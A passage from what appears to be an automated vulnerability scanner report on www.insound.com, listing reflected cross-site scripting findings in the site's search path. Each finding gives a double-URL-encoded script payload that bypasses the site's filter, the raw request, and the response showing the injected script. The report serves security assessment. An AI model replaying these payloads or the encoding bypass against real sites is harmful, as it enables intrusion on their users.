Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nate Query7fd84"><script>alert(1)</script>8cb97fde7aa" />
...[SNIP]...

1.191. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Ruth&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d4cb5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0285cbf68e5 was submitted in the REST URL parameter 3. This input was echoed as d4cb5</title><script>alert(1)</script>0285cbf68e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Ruthd4cb5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0285cbf68e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=61amr3i8cte8ah99ds4k8qoga5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=537959085; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=373090258; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nate Ruthd4cb5</title><script>alert(1)</script>0285cbf68e5</title>
...[SNIP]...

1.192. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Ruth&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40d85bd307f was submitted in the REST URL parameter 3. This input was echoed as ade03"><script>alert(1)</script>40d85bd307f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Ruthade03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40d85bd307f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pc250tviiaal3pnntf4k634un7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=404675123; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=350972573; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nate Ruthade03"><script>alert(1)</script>40d85bd307f" />
...[SNIP]...

1.193. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathalie%20Nordnes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39718%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42e837510e8 was submitted in the REST URL parameter 3. This input was echoed as 39718"><script>alert(1)</script>42e837510e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathalie%20Nordnes39718%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42e837510e8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cdlp3c3fe3adsari6t128fqe07; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=273769947; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490413057; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathalie Nordnes39718"><script>alert(1)</script>42e837510e8" />
...[SNIP]...

1.194. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathalie%20Nordnes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a331b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0de9c568909 was submitted in the REST URL parameter 3. This input was echoed as a331b</title><script>alert(1)</script>0de9c568909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathalie%20Nordnesa331b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0de9c568909&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mamlob44rgorbm2hkkercahnt1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=320514291; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=543169460; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathalie Nordnesa331b</title><script>alert(1)</script>0de9c568909</title>
...[SNIP]...

1.195. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Delfs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c7742ab54 was submitted in the REST URL parameter 3. This input was echoed as 4e3b7"><script>alert(1)</script>24c7742ab54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Delfs4e3b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c7742ab54&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vg1a58190o5vvv4hplkotqa071; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=180485677; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=226670441; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Delfs4e3b7"><script>alert(1)</script>24c7742ab54" />
...[SNIP]...

1.196. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Delfs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c42fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0122504e990 was submitted in the REST URL parameter 3. This input was echoed as c42fb</title><script>alert(1)</script>0122504e990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Delfsc42fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0122504e990&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9lq5akautt8dca1dsjf78c1e26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=268961556; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=44299893; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Delfsc42fb</title><script>alert(1)</script>0122504e990</title>
...[SNIP]...

1.197. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Fake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 67dea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d4bb80bd21 was submitted in the REST URL parameter 3. This input was echoed as 67dea</title><script>alert(1)</script>8d4bb80bd21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Fake67dea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d4bb80bd21&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9gmqdo8smsqpk40i88231kd2t2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28101765; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=42005615; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Fake67dea</title><script>alert(1)</script>8d4bb80bd21</title>
...[SNIP]...

1.198. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Fake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9667a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e591e7ab48cc was submitted in the REST URL parameter 3. This input was echoed as 9667a"><script>alert(1)</script>591e7ab48cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Fake9667a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e591e7ab48cc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ehqgriic2se7hup7dkmjjf5gr7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=36022677; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=443328397; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Fake9667a"><script>alert(1)</script>591e7ab48cc" />
...[SNIP]...

1.199. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Larson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2c4937a327 was submitted in the REST URL parameter 3. This input was echoed as b2f47"><script>alert(1)</script>e2c4937a327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Larsonb2f47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2c4937a327&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vcd0t91bmcfbbotqummfu9s7k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=206753961; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=212603285; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Larsonb2f47"><script>alert(1)</script>e2c4937a327" />
...[SNIP]...

1.200. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Larson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1b81c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec306b7ef72c was submitted in the REST URL parameter 3. This input was echoed as 1b81c</title><script>alert(1)</script>c306b7ef72c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Larson1b81c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec306b7ef72c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e0nj2scu8jrknc1p5tj4d10th1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=41165103; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=485865613; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Larson1b81c</title><script>alert(1)</script>c306b7ef72c</title>
...[SNIP]...

1.201. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Michel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ab9ec%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20af953ef42 was submitted in the REST URL parameter 3. This input was echoed as ab9ec</title><script>alert(1)</script>20af953ef42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Michelab9ec%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20af953ef42&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uhlu7qc2kr9r6m17hl51g9pcb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=148653569; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=451007205; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Michelab9ec</title><script>alert(1)</script>20af953ef42</title>
...[SNIP]...

1.202. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Michel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed64e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e091edb0f64d was submitted in the REST URL parameter 3. This input was echoed as ed64e"><script>alert(1)</script>091edb0f64d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Micheled64e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e091edb0f64d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
